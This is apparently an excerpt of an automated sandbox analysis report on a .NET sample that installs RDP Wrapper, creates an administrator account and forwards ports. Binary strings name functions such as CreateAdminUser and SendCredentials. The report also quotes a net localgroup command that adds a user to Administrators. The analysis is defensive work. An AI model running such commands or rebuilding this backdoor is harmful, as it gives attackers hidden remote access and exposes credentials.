                            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile written: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to behavior
                            Source: hloRQZmlfg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: hloRQZmlfg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: System.pdbIs>b source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Xml.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: costura.costura.pdb.compressedlB source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.DirectoryServices.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: costura.costura.pdb.compressed source: hloRQZmlfg.exe
                            Source: Binary string: System.Configuration.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.00000000057A1000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: rdpclip.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: mscorlib.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.8.dr
                            Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Configuration.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: \mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.0000000005836000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.Xml.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, WER91CD.tmp.dmp.38.dr
                            Source: Binary string: tem.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.0000000005836000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbX source: hloRQZmlfg.exe, 00000000.00000002.1921092597.00000000057A1000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.Core.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.DirectoryServices.pdb4 source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.DirectoryServices.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, WER91CD.tmp.dmp.38.dr
                            Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Management.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: rdpclip.pdbJ source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: mscorlib.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Management.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: HPJo0C:\Windows\mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919019826.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
                            Source: Binary string: RfxVmt.pdb source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.8.dr
                            Source: Binary string: System.Core.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: <>c__DisplayClass0_0<>9__5_0<GetTotalDiskSpace>b__5_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1ToInt32<>u__2Func`2Dictionary`2ToInt64<Main>d__5get_UTF8<>9<Module><Main>U3lzdGVtSW5mb0FBQ2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBGetTotalRAMSystem.IOGetPublicIP_Costuracostura.metadatamscorlib<>cSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordReplaceGetTotalDiskSpaceNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheInvokeIEnumerableIDisposableget_AsyncWaitHandleDownloadFileGetOSNameGetGPUNameget_Nameget_MachineNamefullNameGetAdminGroupNameuserNameGetProcessorNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValuedriveadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamget_Itemset_ItemSystemSymmetricAlgorithmHashAlgorithmTrimRandomrandomICryptoTransformSumTimeSpanIsPortOpenget_ChildrenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionManagementObjectCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderManagementObjectSearcherResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsSystem.Collectionsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatManagementBaseObjectManagementObjectSelectBegin
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: hloRQZmlfg.exe
                            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: 00000000000000000400000000000000g.PDB source: hloRQZmlfg.exe, 00000000.00000002.1923069816.0000000006B90000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Core.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr

                            Data Obfuscation

                            barindex
                            .NET source code contains potential unpacker
                            Source: hloRQZmlfg.exe, QXNzZW1ibHlMb2FkZXJB.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                            Yara detected Costura Assembly Loader
                            Source: Yara matchFile source: hloRQZmlfg.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.hloRQZmlfg.exe.880000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1405997855.0000000000882000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: hloRQZmlfg.exe PID: 2444, type: MEMORYSTR
                            Source: hloRQZmlfg.exeStatic PE information: 0x84BB012B [Wed Jul 25 16:54:03 2040 UTC]
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_004430DC push 00443161h; ret 8_2_00443159
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00439674 push ecx; mov dword ptr [esp], ecx8_2_00439675
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00420164 push 004201DAh; ret 8_2_004201D2
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0040A178 push 0040A1E7h; ret 8_2_0040A1DF
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00437134 push 00437201h; ret 8_2_004371F9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00443188 push 00443230h; ret 8_2_00443228
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0043421C push ecx; mov dword ptr [esp], edx8_2_0043421E
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0044323C push 004432C7h; ret 8_2_004432BF
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00437298 push 0043732Eh; ret 8_2_00437326
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00437360 push 004373ADh; ret 8_2_004373A5
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0043A3F8 push 0043A450h; ret 8_2_0043A448
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_004176D4 push 00417879h; ret 8_2_00417871
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00421998 push 004219E5h; ret 8_2_004219DD
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0042AA70 push ecx; mov dword ptr [esp], edx8_2_0042AA75
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0040CA10 push eax; retf 0040h8_2_0040CA11
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0042AAB4 push ecx; mov dword ptr [esp], edx8_2_0042AAB9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00415C58 push ecx; mov dword ptr [esp], edx8_2_00415C5D
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0040EC80 push ecx; mov dword ptr [esp], ecx8_2_0040EC85
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00404E0C push eax; ret 8_2_00404E48
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0043FE8C push 0043FEE0h; ret 8_2_0043FED8
                            Source: hloRQZmlfg.exeStatic PE information: section name: .text entropy: 7.703627501061181

                            Persistence and Installation Behavior

                            barindex
                            Adds a new user with administrator rights
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_1e47a393 /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_1e47a393 /addJump to behavior
